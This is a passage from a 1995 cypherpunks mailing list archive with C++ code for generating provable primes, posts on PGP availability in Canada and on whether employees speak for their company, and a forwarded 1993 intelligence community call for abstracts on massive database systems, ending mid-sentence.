the form 2q+1 where q is a prime.  It should be sufficient that they are 
of the form rq+1, where q is a large enough prime (say more than 256 
bits).  The following algorithm generates a provable prime p=2rq+1, where q 
is a prime with at least half the length of p.

bignum ProvablePrime(RandomNumberGenerator &rng, unsigned int bits)
{
	const unsigned smallPrimeBound = 29, c_opt=10;
	bignum p;

	BuildPrimeTable();
	if (bits < smallPrimeBound)
	{
		do
			p.Randomize(rng, bignum::Power2(bits-1), 
bignum::Power2(bits)-1, ODD);
		while (TrialDivision(p, 1 << ((bits+1)/2)));
	}
	else
	{
		const unsigned margin = bits > 50 ? 20 : (bits-10)/2;
		double relativeSize;
		do
			relativeSize = pow(2.0, 
double(rng.GetLong())/0xffffffff - 1);
		while (bits * relativeSize >= bits - margin);
		
		bignum a,b;
		bignum q = ProvablePrime(rng, unsigned(bits*relativeSize));
		bignum I = bignum::Power2(bits-2)/q;
		bignum I2 = I << 1;
		unsigned int trialDivisorBound = (unsigned 
int)min((unsigned long)primeTable[primeTableSize-1], (unsigned 
long)bits*bits/c_opt);
		boolean success = FALSE;
		do
		{
			p.Randomize(rng, I, I2, ANY);
			p *= q; p <<= 1; ++p;
			if (!TrialDivision(p, trialDivisorBound))
			{
				a.Randomize(rng, 2, p-1, ANY);
				b = a.ExponentiateMod((p-1)/q, p);
				success = (Gcd(b-1, p) == 1) && 
(b.ExponentiateMod(q, p) == 1);
			}
		}
		while (!success);
	}
	return p;
}





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Thu, 23 Nov 95 04:39:11 PST
To: Still <x93ojg@juliet.stfx.ca>
Subject: Re: PGP in Canada
In-Reply-To: <Pine.A32.3.91.951122213807.121948C@juliet.stfx.ca>
Message-ID: <Pine.OSF.3.91.951123073901.6893B-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


You can try to get PGP from the MIT site but it may not allow you to do 
so if it does not recognize your address as being Canadian. I tried to 
get PGP-Phone and it told me that it did not think that I was a Canadian. 
I wrote to the administrator but have never received a reply. I checked 
about a week ago and I still could not get the file.
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 23 Nov 95 06:00:43 PST
To: karlton@netscape.com (Phil Karlton)
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <30B3CE64.6BF2@netscape.com>
Message-ID: <9511231357.AA10766@all.net>
MIME-Version: 1.0
Content-Type: text


> Alice (or someone representing themselves as Alice) said:
> 
> > What I'm trying to say is that if someome posts from watson.ibm.com,
> > and IF they are talking about OS/2, we will not accept that they are
> > not speaking independantly of the knowledge they have garnered from
> > watson.
> 
> And that is understable.
> 
> > In the same way, someone who writes from Netscape.com or AT&T, or Sun
> > and tries to disclaim that they are speaking for the company, when
> > they step out as an employee of a company is deluding themselves.
> 
> This is a complete non sequitur. See if you can follow this: only those
> authorized by the company to speak for the company are authorized speak
> for the company.

This is not correct, at least according to legal precident.  If someone who
is from Sun representes themselves as being from Sun (i.e., a Sun.Com email
address in their signature line), then when they speak (or email) about Sun,
its products, its policies, etc., they represent Sun.

> There is a genuine difference between a corporate officer saying
> 
> 	The Amalgamated Widget corporate policy on stong crypto is ...
> 
> and some engineer from Amalgamated Widget saying
> 
> 	My private opinion on strong crypto is ...

There is indeed a difference, but it's not as big as you might seem to
think.  Even more importantly, there is a difference between the person
from Amalgamated Widget speaking on strong crypto and the person from
Sun speaking on Java.

> The consequence of every statement by every employee being taken as
> company policy is that every employee (except for public relations) will
> be prohibited from contributing to any public forum or even answering
> apparently innocuous questions on the net. This would not be a desirable
> outcome.

In fact, employees represent the company any time they use company
names, symbols, stationary, return addresses, etc.

If the Netscape legal staff and corporate security board haven't made
this clear to management and employees, that's pretty bad.  If the
officers of Netscape haven't taken appropriate policy measures to notify
employees of this potential liability (it appears that at least they
haven't notified Phillip), then negative consequences could result in
personal liability to the officers (a shareholder lawsuit would be the
most common cause of such liability).  As a Netscape employee, you
should immediately point this out to the corporate person you report to,
and do so in writing.

This sort of lapse is a strong indicator that inadequate IT audit has
been done in Netscape.  In a comprehensive IT audit, such policy lapses
should be identified quickly and changes in corporate policies should
follow very closely. 

> Still speaking for myself,

You are still speaking for Netscape, but hopefully after reading this
message, you and your company will realize it.

> PK
> --
> Philip L. Karlton		karlton@netscape.com
> Principal Curmudgeon		http://www.netscape.com/people/karlton
> Netscape Communications

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Thu, 23 Nov 95 07:01:49 PST
To: cypherpunks@toad.com
Subject: Re: PGP in Canada
In-Reply-To: <Pine.OSF.3.91.951123073901.6893B-100000@nic.wat.hookup.net>
Message-ID: <Pine.A32.3.91.951123110336.108308A-100000@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 Nov 1995, Tim Philp wrote:

> You can try to get PGP from the MIT site but it may not allow you to do 
> so if it does not recognize your address as being Canadian. I tried to 
> get PGP-Phone and it told me that it did not think that I was a Canadian. 
> I wrote to the administrator but have never received a reply. I checked 
> about a week ago and I still could not get the file.
> Tim Philp
> 
I already downloaded a copy last week but I deleted it because I didn't 
knwo if it ws legal to use it and my Sys admin would probable revoke my 
account if it was illegal.  I was talking to him and he told me that if I 
can prove that it is legal he will let me use it.
 

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 23 Nov 95 06:44:09 PST
To: cypherpunks@toad.com
Subject: Intelligence Community Massive Digital Data Systems Initiative
Message-ID: <199511231246.NAA00407@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


Below is some information about the Intelligence Community Massive
Digital Data Systems Initiative.

Summary:
 - new data 2 - 5 terabytes (10^12 bytes) per day
 - total size about 20 petabytes (20 * 10^15 bytes)
 - 300 terabytes on-line, the rest accessible in a few minutes
 - funding (for the research initiative, not for the final system): 
   3-5 million USD per year estimated for investments

Now, how much is 2 - 5 terabytes per day?
  - 20 - 50.000.000 jpeg images (100kB/image, relatively high-quality) per day
  - 20 - 50.000.000 minutes of GSM-quality phone intercepts per day
  - 1.000.000 - 2.500.000 minutes of compressed (256kbit/sec) video per day
  - 1.000.000.000 - 3.000.000.000 e-mail messages per day
  - you can continue the list; most available data sets turn out to be
    much smaller

How much is 20 petabytes?  Assuming you want to collect
information about 100.000.000 people worldwide, this makes 200
megabytes per person (on the average for each of those 100 million
people).

200 megabytes per person on the average is quite a lot, since for many
of those people you probably don't have all that much data.  Maybe 90%
of the data for 10% of the people?  

(Of course, in a database like this you might also have a lot of data
like aerial imaginery, satellite imaginery, economical information,
etc., so it is a little exaggarated to talk about all of it being on
individual people.)

The full text is below.

Crypto relevance?  Makes you think whether you should protect your data.

    Tatu

From: dbowner@cs.wisc.edu ( Dbowner)
To: bal@mitre.org, mike@nobozo.CS.Berkeley.EDU, shosani@csr.lbl.gov,
        gray@sfbay.enet.dec.com, livny@cs.wisc.edu, ragrawal@almaden.ibm.com,
        manola@gte.com, heiler@gte.com, dayal@hplabs.hpl.hp.com,
        shan@hplabs.hpl.hp.com, toby@almaden.ibm.com, reiner@ksr.com,
        jag@allegra.att.com, randy@allspice.berkeley.edu, mcleod@vaxa.isi.edu,
        nick@MIMSY.CS.UMD.EDU, ake@purdue.edu, laney@ccr-p.ida.org,
        darema@watson.ibm.com, grossman@math.uic.edu, dbusa@cs.wisc.edu,
        metadata@llnl.gov, jmaitan@mosaic.uncc.edu, whm@thumper.bellcore.com
Cc: susan@mitre.org, connie@mitre.org
Subject: Call For Papers MDDS
Date: Thu, 18 Nov 93 11:08:03 EST
Resent-To: dbworld-people@cs.wisc.edu
Comments: IF YOU REPLY TO THIS MESSAGE, BE SURE TO EDIT THE to: AND cc: LISTS.
 The dbworld alias reaches many people, and should only be used for
 messages of general interest to the database community.  Mail sent
 to dbedu goes to the subset of addresses with a .edu suffix; mail
 sent to dbusa goes to the subset of US addresses.  Please use
 the smaller lists when appropriate.  Requests to
 get on or off dbworld should go to dbworld-request@cs.wisc.edu.
Reply-To: (Susan L. Hanlon) <susan@linus.mitre.org>
Resent-Reply-To: (Susan L. Hanlon) <susan@linus.mitre.org>



									3 November 1993

Dear Colleague:

Subject:  Call for Abstracts for Massive Digital Data Systems



	Future intelligence systems must effectively manage massive amounts of digital
data (i.e., multi-terabytes or greater).  Issues such as scalability, design,
and integration need to be addressed to realize a wide spectrum of intelligence
systems ranging from centralized terabyte and petabyte systems comprised of many
large objects (e.g., images) to distributed heterogeneous databases that contain
many small and large objects (e.g., text).  The Community Management Staff's
Massive Digital Data Systems (MDDS) Working Group on behalf of the intelligence
community, is sponsoring a two day invitation-only unclassified workshop on the
data management of massive digital data systems with government, industry, and
academia.

	The workshop will be held on the 1st and 2nd of February 1994 in Reston,
Virginia.  The objective of the workshop is to make industry and academia aware
of intelligence community needs, stimulate discussion of the technical issues
and possible solutions, and identify potential research efforts that warrant
further investigation for possible government funding.  The amount of funding
estimated for investments is three to five million dollars per year over the
next 2-3 years.

	Last July, a one-day, classified, government-only workshop was held to
characterize the magnitude of the problem and identify the major challenges. 
The needs, issues, and in some cases, lessons learned, were presented for
different data types including Imagery, Text, Voice, Video, and Multi-media. 
Enclosure 1, "Massive Digital Data System Issues", is an unclassified
description of the consolidated challenges.

	The Massive Digital Data Systems Working Group is soliciting one-page abstracts
related to the issues of the data management of massive digital systems
including (but not limited to) scalability, architecture and data models, and
database management functions.  The focus of the abstract should be on potential
solutions for the longer term research challenges (i.e., 5-10 years out) that
must be addressed today in order to effectively manage data of massive
proportions in the future.  The solutions need not be limited to proven
approaches today but can foster new approaches and paradigms.  Issues relating
to the storage media and analysis tools, while important to the intelligence
community, are not within the scope of the workshop.  Selection for attendance
will be based upon technical relevance, clarity, and quality of the proposed
solution.

Call for Abstracts								Page 2



	Each one-page abstract should follow the abstract format enclosed (Enclosure
2).  All submissions must be UNCLASSIFIED.  To allow enough time for proper
evaluation of each abstract, the deadline for submission is 01 December 1993. 
You will be notified of acceptance to attend by 17 December 1993.  Abstracts
should be forwarded to one of the following:

	Jackie Booth, P.O. Box 9146, Rosslyn Station, Arlington, VA   22219
	Jackie Booth, ORD/SETA, fax number (703) 351-2629
	boothj@mcl.saic.com (Internet)

	Please pass this call for abstracts on to other colleagues that are working on
solutions in this area.

	Sincerely,



	Dr. David Charvonia
	Director, Advanced Technology Office
	Community Management Staff

Enclosures:
  1.  Massive Digital Data Systems Issues
  2.  Abstract Format
	
Enclosure 2
ABSTRACT FORMAT

Title:


Author(s):

Organization/Affiliation:

Address:

Phone:					FAX:


Description:


















Status:  (Research, Prototype, Operational)


Scope:  (Size of effort in terms of dollars and/or staff months;  Size of system
in terms of amount of data, number of databases, nodes, users, etc.)


Customer:  (if applicable)


Operational Use:  (if applicable)


********************************************************************
Forward to one of the following:
	Jackie Booth, P.O. Box 9146, Rosslyn Station, Arlington, VA   22219
	Jackie Booth, ORD/SETA, fax number (703) 351-2629
	boothj@mcl.saic.com (Internet)

-------------------------------------------------------------------
MASSIVE DIGITAL DATA SYSTEMS ISSUES


EXECUTIVE SUMMARY

Future intelligence systems must effectively manage massive amounts of digital
data (i.e., multi-terabytes or greater). Issues such as scalability, design, and
integration need to be addressed to realize a wide spectrum of intelligence
systems ranging from centralized terabyte and petabyte systems comprising many
large objects (e.g. images) to distributed heterogeneous databases that contain
many small and large objects (e.g. text). Consequently, Massive Digital Data
Systems (MDDS) are needed to store, retrieve, and manage this data for the
intelligence community (IC). While several advances have been made in database
management technology, the complexity and the size of the database as well as
the unique needs of the IC require the development of novel approaches. This
paper identifies a set of data management issues for MDDS. In particular,
discussions of the scalability issues, architectural and data modeling issues,
and functional issues are given. The architectures for MDDS could be
centralized, distributed, parallel, or federated. The functions of MDDS include
query processing, browsing, transaction management, metadata management,
multimedia data processing, integrity maintenance, and realtime data processing.
Representing complex data structures, developing appropriate architectures,
indexing multimedia data, optimizing queries, maintaining caches, minimizing
secondary storage access and communications costs, enforcing integrity
constraints, meeting realtime constraints, enforcing concurrency control,
recovery, and backup mechanisms, and integrating heterogeneous schemas, are some
of the complex tasks for massive database management. The issues identified in
this paper will provide the basis for stimulating efforts in massive database
management for the IC.

1.0  INTRODUCTION	
1.1  The Challenge
The IC is challenged to store, retrieve, and manage massive amounts of digital
information. Massive Digital Data Systems (MDDS), which range from centralized
terabyte and petabyte systems containing many large objects (e.g., images) to
distributed heterogeneous databases that contain many small and large objects
(e.g., open source), are needed to manage this information. Although
technologies for storage, processing, and transmission are rapidly advancing to
support centralized and distributed database applications, more research is
still needed to handle massive databases efficiently. This paper describes
issues on data management for MDDS including scalability, architecture, data
models, and database management functions. Issues related to storage media,
analysis tools, and security while important to the IC are not within the scope
of this paper. 

The key set of data management issues for MDDS include:  

	Developing architectures for managing massive databases
	Utilizing data models for representing the complex data structures
	Formulating and optimizing queries
	Developing techniques for concurrency control and recovery
	Integrating heterogeneous schemas
	Meeting timing constraints for queries and transactions
	Indexing multimedia data
	Maintaining caches and minimizing secondary storage access and communications
costs
	Enforcing integrity constraints.

1.2  Background
The IC provides analysis on current intelligence priorities for policy makers
based upon new and historical data collected from intelligence sources and open
sources (e.g., news wire services, magazines). Not only are activities becoming
more complex, but changing demands require that the IC process different types
as well as larger volumes of data. Factors contributing to the increase in
volume include continuing improvements in collection capabilities, more
worldwide information, and open sources. At the same time, the IC is faced with
decreasing resources, less time to respond, shifting priorities, and wider
variety of interests. Consequently, the IC is taking a proactive role in
stimulating research in the efficient management of massive databases and
ensuring that IC requirements can be incorporated or adapted into commercial
products. Because the challenges are not unique to any one agency, the Community
Management Staff (CMS) has commissioned a Massive Digital Data Systems Working
Group to address the needs and to identify and evaluate possible solutions.

1.3  Assumptions and Project Requirements
Future intelligence systems must provide a full suite of services for gathering,
storing, processing, integrating, retrieving, distributing, manipulating,
sharing and presenting intelligence data. The information to be shared is
massive including multimedia data such as documents, graphics, video, and audio.
  It is desired that the systems be adapted to handle new data types.  

The goal is to be able to retain the data for potential future analysis in a
cost effective manner. The more relevant data would remain on-line, say for 5
years, organized with the most relevant data accessible in the least amount of
time. It is expected that 2 to 5 terabytes of new data has to be processed each
day.  Thus, the total size of the database (both on-line and off-line) could be
as large as 20 petabyes with about 300 terabytes of data stored on-line. It is
assumed that storage devices (primary, secondary, and even tertiary) for the
large multimedia databases as well as data pathways with the required capacity
will exist. The access times are about 5 seconds for the data less than a week
old, about 30 seconds for data under two months old, and on the order of minutes
for data up to 10 years old. 

2.0  SCALABILITY ISSUES
A particular data management approach can be scaled to manage larger and larger
databases. That is, a database can often sustain a certain amount of growth
before it becomes too large for a particular approach. For example, more memory,
storage, and processors could be added, a new hardware platform or an operating
system could be adopted, or a different microprocessor could be used (e.g. using
a 32 bit microprocessor instead of a 16 bit microprocessor). Once the size of
the database has achieved its limit with a particular approach, then a new
approach is required. This new approach could be a new architecture, a new data
model, or new algorithms to implement one or more of the functions of the
database management system (DBMS), or a combination of these features.
Discussions of these three features are given below. 

 	Architectures:  The type of architecture impacts the size and response time
of the DBMS.  
	Centralized approaches are being migrated to distributed and parallel
approaches to handle large databases.  Some architectures such as a the shared
nothing parallel architectures are scalable to thousands of processors, but will
have multiprocessor communication issues.  Current approaches need to be
assessed to determine their scalability limits.  New approaches may be required
for handling massive databases.


 	Data Models:  Data models which support a rich set of constructs are desired
for next generation database applications.  However, the search and access time
of the DBMS would depend on the data model used. For example DBMSs which support
complex data structures use large caches, access data through pointers, and work
well with large main memory in general, while DBMSs based on simpler data models
maintain index files and provide associative access to the secondary storage.
The limits of these models within the context of massive databases need to be
understood.  New or modified approaches may be required.

	DBMS Functions:  The techniques to implement the DBMS functions have to be
modified to handle massive databases.  For example, as the size of the database
increases, new approaches for  query optimization, concurrency control,
recovery, and backup, access methods and indexing, and metadata management will
be required.  

The architectural, data modeling, and functional issues that need to be
addressed for MDDS will be elaborated in sections 3 and 4. 

3.0  ARCHITECTURAL AND DATA MODELING ISSUES
3.1  Architectural Issues
This section describes some of the architectural issues that need to be
addressed for an MDDS. In the case of the centralized approach, a major issue is
managing the data transfer between the main memory and secondary storage. One
could expect the data that is a week old to be cached in main memory, the data
that is less than two months old to be in secondary memory, and data that is a
few years old to be in tertiary storage. In designing the data management
techniques (such as those for querying, updating, and transaction processing),
data transfer between the main and secondary memories needs to be minimized.
There is also a need to reflect patterns of use (e.g., in migrating items to
lower/higher levels of storage hierarchy). Another issue is the relationship
between the size of the cache and the size of the database. 

When one migrates to distributed and parallel architectures, a goal is to
maintain a larger number of smaller databases. It is assumed that processors and
storage devices are available. A  major issue is the communication between the
processors. In designing the data management mechanisms, an objective would be
to minimize the communication between the different processors. For example, in
the case of a join operation between several relations in a relational DBMS,
each fragmented across multiple sites, an issue is whether to merge all of the
fragments of a relation and then perform the join operation or whether to do
several join operations between the fragments and then merge the results to form
the final result. Different configurations of the distributed and parallel
architectures also need to be examined. For example, there could be
point-to-point communication between every processor, or the processors could be
arranged in clusters and communication between clusters is carried out by
designated processors. Another issue in migrating to a distributed architecture
is handling data distribution. For example, if the data model is relational,
then how could one fragment the various relations across the different sites? 
If the relations are to be replicated for availability, then how could
consistency of the replicated copies be maintained?  Another issue is what data
could be cached within the distributed system, how could data be cached, and for
how long could the cache be maintained. 
   
While distributed and parallel architectures are being investigated for managing
massive databases, federated architectures are needed to integrate the existing
different and disparate databases.  The existing databases could be massive
centralized databases or they could be distributed databases. Furthermore, they
could be relational, object-oriented and even legacy systems.  An issue in
heterogeneous database integration is developing standard uniform interfaces
which can be accessed via an integration backplane.  If the environment is a
federated one, where the nodes have some autonomy, then a major issue is the
ability to share each other's data while maintaining the autonomy of the
individual DBMSs. This is hard because cooperation and autonomy are conflicting
goals.  The techniques to implement the DBMS functions for data retrieval,
updates, and maintaining integrity have to be adapted or new approaches have to
be developed for federated architectures.  

Extensible architectures are also being investigated for massive databases. 
With such architectures, DBMSs are extended with inferencing modules which make
deductions from data already in the database.  This way, one need not store all
of the data in the database explicitly. Instead, appropriate inference rules are
used to make deductions and derive new data.  This way the size of the database
is reduced.  The issues include determining what data is to be stored in the
database and what data is to be stored in the knowledge base manipulated by the
inferencing module, effective management of the knowledge base, and adapting the
functions of the DBMS to handle extensible architectures.  
   
3.2  Data Modeling Issues

In selecting an appropriate data model for massive databases, several issues
must be considered. Providing a data model powerful enough to support the
representation of complex data must be addressed.  For example, with a
multimedia document, one may need to devise a scheme to represent the entire
document in such a way to facilitate browsing and updating. Since the age of a
document could be used to move it between different storage media, it is
desirable for the data model to support the representation of temporal
constructs. The representation of different types of multimedia devices and
grouping of documents are also important considerations in selecting a data
model. The data model chosen has an impact on the techniques to implement the
functions of a DBMS. For example, DBMSs based on some models use associative
access while those based on some other models use pointer traversal. 

In migrating to a distributed/parallel architecture, if it is assumed that the
data model is the same for all databases, then a major issue is whether it is
feasible to provide a conceptual view of the entire massive database to the
user. However, in the case of a federated architecture, since it is generally
assumed that the individual data models are different, several additional issues
need to be considered. For example, could the users have a global view of the
massive database or could they have their own individual views?  In either case,
it would be desirable for the users to access the distributed databases in a
transparent manner. If a global view is enforced, the query processor could
transform the queries on the global view to the views of the individual
databases. If each user has his own view, then the query processor could
transform the users view into the views of the individual databases. Other
issues for a federated architecture include the representation of the individual
schemas (which describe the data in the databases), determining which schemas to
be exported to the federation, filtering appropriate information from the
schemas at different echelons, integrating the schemas to provide a global view,
and generating the external schemas for the users. In integrating the different
schemas, the semantic and syntactic inconsistencies between the different
representations need to be resolved. For example, the address in database A
could include the house number and the street name while in database B it could
just be the city and the state. 

4.0  FUNCTIONAL ISSUES   
The techniques to implement the functions of MDDS will be impacted by the
architectures and data models as well as requirements such as integrity and
multimedia data processing. Therefore some of the functional issues have already
been addressed in section 3. This section provides a more detailed overview of
the functional issues.  First the basic functional issues for MDDS (such as
issues on query processing and transaction management) will be discussed and
then the impact of maintaining integrity, realtime processing, and multimedia
data processing will be given. 

4.1 Querying, Browsing, and Filtering
The query operation is a means by which users can retrieve data from the
database. Closely related is the browsing operation where users traverse various
links and subsequently scan multiple documents either sequentially or
concurrently. To determine if the new information warrants viewing by the
analyst and/or to enforce access control, automatic filtering of the data is
needed. Some issues in query management for massive databases are using an
appropriate language for specifying queries and developing optimization
techniques for the various operations involved in a query. The goals are to make
it easier for users to formulate queries and also to minimize data transfer
between primary and secondary storage. 

Query management in a federated environment must provide the means for
formulating and processing queries seamlessly and efficiently. This involves
designing an interface for formulating queries over multiple sources. There is a
need for query optimization, in order to prevent degradation in performance in
the distributed system. In addition to determining the execution strategy for a
query, query optimization techniques could also determine which portion of the
query processing is to remain under direct and unshared control at the analyst's
workstation. Methods need to be developed for browsing the integrated
information space and for displaying results obtained from multiple sources.
Finally, data from local databases have to be filtered according to the various
constraints (such as security constraints) and enforced before sending it to the
remote sites. 

Query processing algorithms in an extensible architecture need to incorporate
inferencing techniques.  The usefulness of inferencing techniques for
intelligence applications can best be illustrated with a simple example. Suppose
parts A, B, C and D are needed to build a nuclear weapon, and also suppose that
the following constraint is enforced:  " if three of the four parts are shipped
to country X, then the fourth part should not be shipped to X."   Therefore, if
parts A, B, and C are already shipped to X and there is a request from X for
part D, then the inferencing module will determine that this part cannot be
shipped.  An issue in developing an inference module is determining the
deduction strategies to be implemented. These strategies could be just logical
deduction or could include more sophisticated techniques such as reasoning under
uncertainty and inductive inference. With most inference strategies one runs
into the problem of an infinite loop; therefore appropriate time limits must be
enforced to control the computation.

In general, the issues to be addressed in query management will include:

	Query optimization.
	Handling data distribution
	Making intelligent deductions 
	Uniform vs. user-tailored query language 

4.2  Update Transaction Processing
Multi-user updates are supported in general to improve performance. The goal is
for multiple users to be able to update the database concurrently. A major issue
here is ensuring that the consistency of the database is maintained. The
techniques that ensure consistency are concurrency control techniques. Often
update requests are issued as part of transactions. A transaction is a program
unit that must be executed in its entirety or not executed at all. Therefore, if
the transaction aborts due to some error, such as system failure, then the
database is recovered to a consistent state.

Several concurrency control algorithms have been designed and developed for
different environments. Some algorithms are suitable for short transactions in
business processing applications and some others are suitable for long
transactions which often involve multimedia data. To handle long transactions
efficiently, weaker forms of consistency conditions have been formulated.
Several recovery techniques have also been developed to maintain the consistency
of the database. If the transaction is long, then the log files that record the
actions of the transaction may be quite large. Efficient management of log files
becomes an issue. As the size of the database increases, a transaction would
take a longer time for execution. Adapting the concurrency control and recovery
algorithms or developing new algorithms to work with the massive databases
becomes an issue.  

Update transaction processing gets more complicated in distributed and federated
environments. For example, if replicated copies are to be maintained, then
making them consistent will have an impact on the performance. Therefore, an
issue here is whether to maintain strict consistency or select a subset of the
copies and make them consistent immediately so that the remaining copies could
be updated at a later time. One of the problems with a federated environment is
the different concurrency control and recovery algorithms used by the individual
DBMSs. In such a situation synchronizing the different techniques becomes a
major issue. 

4.3  Access Methods and Index Strategies
To enhance the performance of query and update algorithms, efficient access
methods and index strategies have to be enforced. That is, in generating
strategies for executing query and update requests, the access methods and index
strategies that are used need to be taken into consideration. The access methods
used to access the database would depend on the indexing methods. Therefore
creating and maintaining appropriate index files is a major issue in a DBMS.
Usually, the size of the index file grows with the size of the database. In some
cases, the index file could be larger than the database itself. Some of the
issues include determining what type of indexes are to be maintained for massive
databases.  Is it feasible to have dense indexing where there is an entry in the
index file for every entry in the database?  If so, the index file could have as
many entries as there are in the database. Is it better to have sparse indexing
so that the size of the index file could be reduced?  If so, is there a strategy
to determine which entries in the database are to be indexed?  For multimedia
data, indexing could be done not only by content but by type, language, context
(i.e., where, how, when it was collected), author (i.e., for documents), and
speaker (i.e., for voice). The challenge is how to index and to provide improved
mechanisms for extraction of the information used for indexing.   For example,
the ability to automatically index voice is desired.  Additionally, the ability
to index voice and video (with associated voice) with their transcriptions
(i.e., time alignment) is necessary.

Various storage structures have been proposed. These include B-Trees and
Parent-Child links. The question is, are these methods suitable for massive
databases? Voice and video data require segmentation into logical units for
storage and access. Additionally, the ability for automatic segmentation within
documents of embedded drawings and figures and their interpretation (via
seamless integration with image handling tools) is needed. Other challenges
include providing user transparent hierarchical storage management (i.e., store
the most relevant or most recent information on the fastest media) and the
ability to reposition data in the storage hierarchy based upon changing
importance, migration mechanisms for transferring information to newer storage
media or a new architecture (failure to do so can lead to exorbitant costs to
maintain discontinued storage media drives or inaccessible data), archival
technology/policies for older/less important information, and synchronization of
information distributed across multiple repositories

Compression can decrease the costs of storage and transmission especially for
the larger objects such as vector and raster spatial data types, voice, imagery,
and video. Real-time conversion of heterogeneous voice and video compression and
file formats in network broadcasts/multicasts is an issue.  For imagery, a
capability such as pyramidal decomposition for providing reduced resolution
images is needed for browsing purposes.

4.4  Managing the Metadata
The metadata includes a description of the data in the database (also referred
to as the schemas), the index strategies and access methods used, the integrity
mechanisms enforced, and other information for administrative purposes. 
Metadata management functions include representing, querying, and updating, the
metadata.  In massive databases, if the metadatabase is much smaller than the
database, then the traditional techniques could be applied to manage the
metadata. If the metadatabase becomes massive, then new techniques need to be
developed. An issue here is whether the techniques for massive databases could
be applied for massive metadatabases also. Support for schema evolution is
desired in many new generation applications.  For example, the structures of the
entities in the database could change with time.  An entity could acquire new
attributes or existing attributes could be deleted. The metadata needs to be
represented in a manner that would facilitate schema evolution. That is,
appropriate models to represent the metadata are desired. Since the metadata has
to be accessed for all of the functions of a DBMS, the module that is
responsible for accessing the metadata needs to communicate with all the other
modules. Efficient implementation of this module is necessary to avoid
performance bottlenecks. 

Certain types of metadata, such as the schemas, are usually accessible to the
external users.  An issue here is whether to provide a view to the users that is
different from the system's view of the metadata.  For example, a different
representation of the metadata could be sued for the users.  Also, if the
metadatabase is massive, then subsets of it could be presented to the users.    

4.5  Integrity
Concurrency control and recovery issues discussed in section 4.3 are some of the
issues that need to be dealt with in order to maintain the integrity  (i.e.
consistency) of the database. Other types of integrity include maintaining the
referential integrity of entities and enforcing application dependent integrity
constraints. Referential integrity mechanisms must ensure that the entities
referenced exist. The question is, how could the references to an entity be
deleted when an entity itself is deleted?  If the databases are massive, then
there will probably be more references to the deleted entity. Deleting all these
references in a timely manner is an issue.

In the case of application specific integrity constraints, they could trigger a
series of updates when one or more items in the database gets updated. Again, as
the size of the database increases, the number of updates that are triggered
could also increase. The issue here is ensuring that the updates are carried out
in a timely manner. 	

4.6  Realtime / Near Realtime Processing
Within a massive digital data system, the challenges of realtime or near
realtime processing will be compounded.  For realtime or near realtime
applications, timing constraints may be enforced on the transactions and/or the
queries. In the case of a hard realtime environment, meeting the timing
constraints may cause the integrity of the data to suffer. In the case of soft
realtime constraints (also referred to as near real-time), there is greater
flexibility in meeting the deadlines. The issues for real-time processing
include:

 	If a transaction misses its deadline, then what are the actions that could be
taken?   
	Could a value function be associated with a transaction which can be used to
determine whether the transaction should continue after it misses its deadline?
	Could the transaction be aborted if the value of the data approaches zero?  
	What is the impact on the scheduling algorithms when timing constraints are
present?  
	How can the techniques be extended for a distributed/federated architecture? 
	In the case of realtime updates in a distributed replicated environment, is it
possible to maintain the consistency of the replicated copies and still meet the
timing constraints?  
	What is the impact on the techniques for multimedia data processing?
4.7  Multimedia Data Processing
By nature, multimedia data management has to deal with many of the requirements
for indexing, browsing, retrieving, and updating of the individual media types. 
Implementing multimedia data types will require new paradigms for representing,
storing, processing, accessing, manipulating, visualizing, and displaying data
from various sources in different media. One of the major issues here is
synchronizing the display of different media types such as voice and video. 
Other issues include selecting/developing appropriate data models for
representing the multimedia data and developing appropriate indexing techniques
such as maintaining indexes on textual, voice, and video patterns.  For example,
the ability to index voice and video simultaneously may be desired.  

In addition to the manipulation of multimedia data, frameworks for the
integration of multimedia objects as well as handling different granularity of
multimedia objects (i.e., 1 hour video clip versus a spreadsheet cell) need to
be considered. A flexible environment has to be provided so that the linked and
embedded distributed multimedia objects can accommodate geographic/network
changes.  Finally, the data manipulation techniques as well as the frameworks
need to be extensible to support new and diverse data types.  

4.8  Backup and Recovery
On-line backup procedures are being used for massive databases. This is because
off-line procedures will consume too much time for massive databases. Even if
the backup procedures are carried out on-line, the system could be slowed down
and therefore the performance of other data management functions would suffer.
The issue here is to develop improved techniques for backup so that it will not
impact functions such as querying, browsing, and updating. 

Recovery issues for transaction management were discussed in section 4.3. Other
recovery issues include whether to maintain multiple copies of the database, and
if so, the number of copies to be maintained, and whether the checkpointing,
roll-back and recovery procedures proposed for traditional databases could be
used for massive databases or is there a need to develop special mechanisms?

5.0  SUMMARY

Massive digital data systems will require effective management, retrieval, and
integration of databases which are possibly heterogeneous in nature. Achieving
this concept of massive intelligence information systems will require new
technologies and novel approaches for data management. While hardware is rapidly
advancing to provide massive data storage, processing, and transmission, the
software necessary for the retrieval, integration, and management of data
remains an enormous challenge.

This paper has identified a set of issues for managing the data in massive
digital data systems with a focus on intelligence applications. First, an
overview of the current approaches to data management and the scalability of the
current approaches were discussed  Then some architectural and data modeling
issues were given. Finally, a discussion of the issues for the various functions
of MDDS were given. The set of issues identified is by no means considered a
complete list. As the progression of research, prototyping, and deployments
